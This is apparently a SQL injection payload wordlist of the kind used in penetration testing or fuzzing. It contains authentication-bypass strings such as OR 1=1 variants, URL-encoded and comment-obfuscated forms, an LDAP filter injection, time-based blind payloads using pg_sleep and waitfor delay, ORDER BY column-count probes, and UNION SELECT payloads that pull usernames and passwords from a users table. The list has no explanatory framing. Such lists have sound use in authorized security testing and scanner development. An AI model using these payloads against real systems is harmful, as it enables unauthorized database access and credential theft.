' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
' OR 1=0--
%27%20or%201=1
*(|(object=*))
)%20or%20('x'='x
%20or%201=1
1) or pg_sleep(__TIME__)--
/**/or/**/1/**/=1
' or username like '%
);waitfor delay '0:0:__TIME__'--
or isNULL(1/0) /*
x' or 1=1 or 'x'='y
 --- ORDER BY ---
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
--- ONION ---
' UNION SELECT NULL-- 
' UNION SELECT NULL,NULL--  
' UNION SELECT NULL,NULL,NULL--  
' UNION SELECT NULL,NULL,NULL,NULL,'a'-- //
' union select null, id, username, password, fname from users -- //
' UNION SELECT username, password FROM users --
